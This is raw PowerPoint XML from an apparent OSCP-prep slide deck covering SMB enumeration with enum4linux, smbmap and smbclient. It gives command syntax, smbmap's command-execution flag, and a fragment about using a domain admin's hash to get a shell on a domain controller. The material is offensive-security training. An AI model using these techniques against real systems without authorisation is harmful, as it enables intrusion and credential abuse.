              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>brent_da</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hash to get a shell on the DC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Oval 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB8FEE0C-A288-4E56-B0DB-BC8EAF4A2B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9734200" y="1715352"/>
            <a:ext cx="571500" cy="5715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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD283E5-DE4E-4FE6-98C4-7DCA5199AF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590803" y="3249427"/>
            <a:ext cx="2830036" cy="2990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3D48651-3D70-4E68-A037-CC350102DD2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1850893">
            <a:off x="7064136" y="3974391"/>
            <a:ext cx="2280386" cy="4438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4A11695-9B1F-4DF7-9514-E291D0F98D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="9631454" y="3421115"/>
            <a:ext cx="768453" cy="443829"/>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289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A968C-A539-4C4D-8289-8EE26C9190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38EC77C5-44AC-4D09-BF54-15B13350E184}"/>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A523BF85-10DA-4545-957C-D34154036C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File share protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port 445</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shares are accessed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\\IP\ShareName</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If misconfigured, can give file share access like FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smbclient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>enum4linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smbmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192909057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03E1D-8AAF-48DF-8FB7-5767DA3AFE2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>310</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99310F87-94B7-4A09-A86E-CF7E99BB6141}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wrap Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7133EC9-D179-4473-9449-E380E4FC8E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OSCP AD is very basic – OSEP is where you get into more meat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OSCP labs have opportunities to practice – get those 40 points</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47919234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fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>311</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607812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17240F-9622-4F82-B352-90455ADBD7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035BA2B-0C3C-43D6-B0E8-4B55A18F049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enum4linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3B1A11-78A7-4254-B18F-4C1187A1A090}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295399"/>
            <a:ext cx="11363325" cy="3664789"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>enum4linux -a &lt;IP&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will do all basic checks for users, shares, password policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AutoRecon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> writes this to a file – output is too robust for here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Switches used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AutoRecon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: do all simple enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: get the machine list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: try limited LDAP enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: be detailed for users and shares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA539FF0-9EB6-4ED0-99B5-C0B88260B931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2152099" y="5113506"/>
            <a:ext cx="7887801" cy="657317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAA3D121-A64C-42D3-8BAE-0277236AED56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2030179" y="5770823"/>
            <a:ext cx="2003949" cy="369332"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216497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17240F-9622-4F82-B352-90455ADBD7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035BA2B-0C3C-43D6-B0E8-4B55A18F049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smbmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F16BF0-7793-4C23-B7FE-236157BA0E1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="3509737"/>
            <a:ext cx="11363325" cy="1559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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="50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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CAFE240-0BA6-4A78-8628-C23FC343CABE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2381391" y="2209880"/>
            <a:ext cx="7468642" cy="981212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0134C14-97E6-4387-88A1-CF1388FD47D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11137581" cy="2248867"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smbmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple options – execution, directory listing, permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE17673-2E77-46E0-8D10-98A9DE3D3685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1915187" y="3291205"/>
            <a:ext cx="8401050" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C88E95B3-7617-478F-B697-773C3FC37C45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546921" y="5141401"/>
            <a:ext cx="11137581" cy="1251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Other Useful Flags:</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-u</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(user), </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-p</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(password), </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-s</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(share), </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
            </a:b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-x &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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cmd</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&gt;</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(execute a command), </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-R</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(recursive </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> command)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3478255C-0992-4695-9AE6-6EF5FA6D0C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7846084" y="2175170"/>
            <a:ext cx="2003949" cy="369332"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{431ECED6-ECDC-4615-A7CC-C9CBC6ED5AE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131986" y="3197116"/>
            <a:ext cx="2003949" cy="646331"/>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Example: Share Permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0F993C7-51AD-4F74-9329-1F97BB5A5A46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4175760" y="4026838"/>
            <a:ext cx="1158239" cy="10424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306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2946-EEB3-4ABE-9AB5-79EAFB346E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6E90862C-511C-4C2A-8D71-D27A152358DE}"/>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smbclient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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91F43517-1FE7-4576-B44C-A9C302DEAAEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="2809240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be used for enumeration and interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enumeration Syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -L \\\\IP -N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interaction – Behaves like FTP: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> //IP/share -U [""|user] [-P pass| -N (no pass)]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C712DEFE-F2E3-412C-BE7E-054FC5AE6879}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218783" y="2180012"/>
            <a:ext cx="7754432" cy="619211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{287582DA-7D8A-41E6-97DD-A68D8ADF8188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1891424" y="4058778"/>
            <a:ext cx="8840434" cy="2076740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{040D27A1-6284-482B-A9EA-97D4D469F525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7846084" y="2175170"/>
            <a:ext cx="2003949" cy="369332"/>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AutoRecon</a:t>
            </a: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 TOML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237950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4E6839-6031-45CF-B04E-0A611ECDF3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BE931D6C-DC8B-4B84-A71A-5188E073700A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1242305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A8E8B6-EBB2-4531-A258-25496A1FAE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A5EFB90-E782-43A1-AB09-C96E9B8A70DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
